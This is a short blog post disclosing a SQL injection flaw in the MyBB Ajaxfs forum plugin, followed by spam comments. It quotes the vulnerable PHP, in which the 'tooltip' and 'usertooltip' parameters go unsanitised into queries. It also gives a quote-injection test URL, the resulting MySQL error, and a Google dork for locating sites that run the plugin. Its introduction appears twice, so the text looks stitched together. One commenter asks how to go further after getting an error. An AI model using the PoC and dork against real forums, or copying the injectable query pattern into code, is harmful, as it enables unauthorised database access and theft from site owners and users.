Welcome once again :D
Today i was just browsing 1337day.com and come across a exploit title as Mybb Ajaxfs Plugin Sql Injection which they selling it for 150$.
http://1337day.com/exploit/description/21541
So i just start to pentest the plugin and in just two minutes i found the bug.
So here are the details
Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2
The plugin is vuln to tooltip and usertooltip parameter in ajaxfs.php
POC
code:
#Independent Pakistani Security Researcher
Today i was just browsing 1337day.com and come across a exploit title as Mybb Ajaxfs Plugin Sql Injection which they selling it for 150$.
http://1337day.com/exploit/description/21541
So i just start to pentest the plugin and in just two minutes i found the bug.
So here are the details
Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2
The plugin is vuln to tooltip and usertooltip parameter in ajaxfs.php
POC
code:
1 if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
2 if(isset($_GET['usertooltip']))http://localhost/Upload/ajaxfs.php?usertooltip=1'
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1Google DORK : inurl:ajaxfs.php
#Independent Pakistani Security Researcher
4 comments:
can u guide me whats next if i got myBB eror plz
This blog is useful.
Emergency Dentist Near Me
Good information should be provided to more people.
Summer
It's great that I came across this blog.
sluts mature
Post a Comment